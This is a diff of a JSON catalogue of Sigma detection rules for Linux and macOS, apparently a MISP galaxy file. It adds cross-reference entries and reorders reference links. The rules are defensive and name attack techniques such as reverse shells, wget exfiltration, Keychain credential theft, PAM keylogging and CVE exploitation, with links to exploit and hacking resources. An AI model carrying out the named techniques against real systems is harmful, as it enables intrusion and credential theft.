"2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", "value": "Scheduled Cron Task/Job - MacOs" }, @@ -61508,6 +79291,15 @@ "attack.t1030" ] }, + "related": [ + { + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", "value": "Split A File Into Pieces" }, @@ -61524,8 +79316,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", + "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" ], "tags": [ @@ -61557,6 +79349,15 @@ "attack.t1087.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", "value": "Local System Accounts Discovery - MacOs" }, @@ -61606,6 +79407,15 @@ "attack.t1070.002" ] }, + "related": [ + { + "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", "value": "Indicator Removal on Host - Clear Mac System Logs" }, @@ -61630,6 +79440,15 @@ "attack.t1529" ] }, + "related": [ + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", "value": "System Shutdown/Reboot - MacOs" }, @@ -61679,6 +79498,15 @@ "attack.t1555.001" ] }, + "related": [ + { + "dest-uuid": "1eaebf46-e361-4437-bc23-d5d65a3b92e3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", "value": "Credentials from Password Stores - Keychain" }, @@ -61720,9 +79548,9 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" ], @@ -61742,8 +79570,8 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" ], @@ -61765,8 +79593,8 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" ], @@ -61801,6 +79629,29 @@ "attack.t1203" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd" }, @@ -61849,6 +79700,15 @@ "attack.t1222.002" ] }, + "related": [ + { + "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", "value": "File or Folder Permissions Change" }, @@ -61890,7 +79750,6 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://attack.mitre.org/techniques/T1543/002/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" ], "tags": [ @@ -61924,6 +79783,22 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", "value": "BPFDoor Abnormal Process ID or Lock File Accessed" }, @@ -61940,7 +79815,6 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1123/", "https://linux.die.net/man/1/arecord", "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" @@ -61983,7 +79857,7 @@ "author": "Igor Fits, oscd.community", "creation_date": "2020/10/13", "falsepositive": [ - "Legitimate script work" + "Unknown" ], "filename": "lnx_auditd_binary_padding.yml", "level": "high", @@ -62015,7 +79889,6 @@ "logsource.product": "linux", "refs": [ "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://attack.mitre.org/techniques/T1027/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" ], "tags": [ @@ -62088,7 +79961,6 @@ "refs": [ "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://linux.die.net/man/1/xclip", - "https://attack.mitre.org/techniques/T1115/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" ], "tags": [ @@ -62113,7 +79985,6 @@ "logsource.product": "linux", "refs": [ "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://attack.mitre.org/techniques/T1027/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" ], "tags": [ @@ -62138,7 +80009,6 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", - "https://attack.mitre.org/techniques/T1547/006/", "https://linux.die.net/man/8/insmod", "https://man7.org/linux/man-pages/man8/kmod.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" @@ -62149,6 +80019,15 @@ "attack.t1547.006" ] }, + "related": [ + { + "dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", "value": "Loading of Kernel Module via Insmod" }, @@ -62190,8 +80069,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://access.redhat.com/security/cve/CVE-2021-4034", "https://github.com/berdav/CVE-2021-4034", + "https://access.redhat.com/security/cve/CVE-2021-4034", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" ], @@ -62200,6 +80079,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", "value": "Potential CVE-2021-4034 Exploitation Attempt" }, @@ -62216,10 +80104,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://linux.die.net/man/1/import", "https://imagemagick.org/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://attack.mitre.org/techniques/T1113/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" ], "tags": [ @@ -62243,7 +80130,6 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1562/004/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", "https://firewalld.org/documentation/man-pages/firewall-cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" @@ -62253,6 +80139,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", "value": "Disable System Firewall" }, @@ -62270,7 +80165,6 @@ "logsource.product": "linux", "refs": [ "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://attack.mitre.org/techniques/T1027/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" ], "tags": [ @@ -62296,8 +80190,8 @@ "refs": [ "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", "https://mn3m.info/posts/suid-vs-capabilities/", - "https://man7.org/linux/man-pages/man8/getcap.8.html", "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + "https://man7.org/linux/man-pages/man8/getcap.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" ], "tags": [ @@ -62307,6 +80201,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", "value": "Linux Capabilities Discovery" }, @@ -62372,8 +80275,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" ], "tags": [ @@ -62403,6 +80306,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", "value": "Masquerading as Linux Crond Process" }, @@ -62420,7 +80332,6 @@ "logsource.product": "linux", "refs": [ "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://attack.mitre.org/techniques/T1027/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" ], "tags": [ @@ -62453,6 +80364,15 @@ "attack.t1552.003" ] }, + "related": [ + { + "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", "value": "Suspicious History File Operations - Linux" }, @@ -62477,6 +80397,15 @@ "attack.t1070.006" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", "value": "File Time Attribute Change - Linux" }, @@ -62501,6 +80430,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", "value": "Possible Coin Miner CPU Priority Param" }, @@ -62526,6 +80464,15 @@ "cve.2021.3156" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing" }, @@ -62567,7 +80514,6 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/tactics/TA0010/", "https://linux.die.net/man/1/wget", "https://gtfobins.github.io/gtfobins/wget/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" @@ -62577,6 +80523,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", "value": "Data Exfiltration with Wget" }, @@ -62595,7 +80550,6 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://attack.mitre.org/techniques/T1543/002/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" ], "tags": [ @@ -62627,6 +80581,15 @@ "attack.t1030" ] }, + "related": [ + { + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", "value": "Split A File Into Pieces - Linux" }, @@ -62644,7 +80607,6 @@ "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/xclip", - "https://attack.mitre.org/techniques/T1115/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" ], "tags": [ @@ -62677,6 +80639,15 @@ "cve.2021.3156" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", "value": "CVE-2021-3156 Exploitation Attempt" }, @@ -62702,6 +80673,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", "value": "Bpfdoor TCP Ports Redirect" }, @@ -62728,6 +80708,22 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", "value": "Program Executions in Suspicious Folders" }, @@ -62752,6 +80748,15 @@ "attack.t1222.002" ] }, + "related": [ + { + "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", "value": "Remove Immutable File Attribute - Auditd" }, @@ -62776,6 +80781,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", "value": "Data Compressed" }, @@ -62818,7 +80832,6 @@ "refs": [ "https://linux.die.net/man/1/xwd", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", - "https://attack.mitre.org/techniques/T1113/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" ], "tags": [ @@ -62850,6 +80863,15 @@ "attack.t1529" ] }, + "related": [ + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", "value": "System Shutdown/Reboot - Linux" }, @@ -62875,6 +80897,15 @@ "attack.t1006" ] }, + "related": [ + { + "dest-uuid": "0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb0647d7-371a-4553-8e20-33bbbe122956", "value": "Use of Debugfs to Access a Raw Disk" }, @@ -62891,10 +80922,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", "https://man7.org/linux/man-pages/man1/passwd.1.html", - "https://attack.mitre.org/techniques/T1201/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", "https://linux.die.net/man/1/chage", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" ], @@ -62903,6 +80933,15 @@ "attack.t1201" ] }, + "related": [ + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", "value": "Password Policy Discovery" }, @@ -62920,7 +80959,6 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://attack.mitre.org/techniques/T1082/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" ], "tags": [ @@ -62953,6 +80991,15 @@ "attack.t1546.004" ] }, + "related": [ + { + "dest-uuid": "b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", "value": "Edit of .bash_profile and .bashrc" }, @@ -62978,6 +81025,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", "value": "Overwriting the File with Dev Zero or Null" }, @@ -62994,11 +81050,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1003/", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://linux.die.net/man/8/pam_tty_audit", - "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", + "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" ], "tags": [ @@ -63007,6 +81062,15 @@ "attack.t1056.001" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", "value": "Linux Keylogging with Pam.d" }, @@ -63031,6 +81095,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", "value": "Suspicious Commands Linux" }, @@ -63047,7 +81120,6 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1564/001/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" ], @@ -63056,6 +81128,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", "value": "Hidden Files and Directories" }, @@ -63073,8 +81154,8 @@ "logsource.product": "linux", "refs": [ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", - "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", + "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" ], "tags": [ @@ -63082,6 +81163,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", "value": "Creation Of An User Account" }, @@ -63099,8 +81189,8 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", - "https://book.hacktricks.xyz/shells/shells/linux", "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://book.hacktricks.xyz/shells/shells/linux", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" ], "tags": [ @@ -63156,6 +81246,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", "value": "Remote File Copy" }, @@ -63181,6 +81280,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", "value": "Equation Group Indicators" }, @@ -63205,6 +81313,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", "value": "Symlink Etc Passwd" }, @@ -63229,6 +81346,15 @@ "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", "value": "Commands to Clear or Remove the Syslog - Builtin" }, @@ -63253,6 +81379,15 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", "value": "Buffer Overflow Attempts" }, @@ -63277,6 +81412,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", "value": "Suspicious Reverse Shell Command Line" }, @@ -63326,6 +81470,22 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", "value": "Privileged User Has Been Created" }, @@ -63351,6 +81511,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", "value": "Nimbuspwn Exploitation" }, @@ -63375,6 +81544,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", "value": "JexBoss Command Sequence" }, @@ -63439,10 +81617,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://artkond.com/2017/03/23/pivoting-guide/", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", "http://pastebin.com/FtygZ1cg", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "https://artkond.com/2017/03/23/pivoting-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" ], "tags": [ @@ -63450,6 +81628,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", "value": "Suspicious Activity in Shell Commands" }, @@ -63466,9 +81653,9 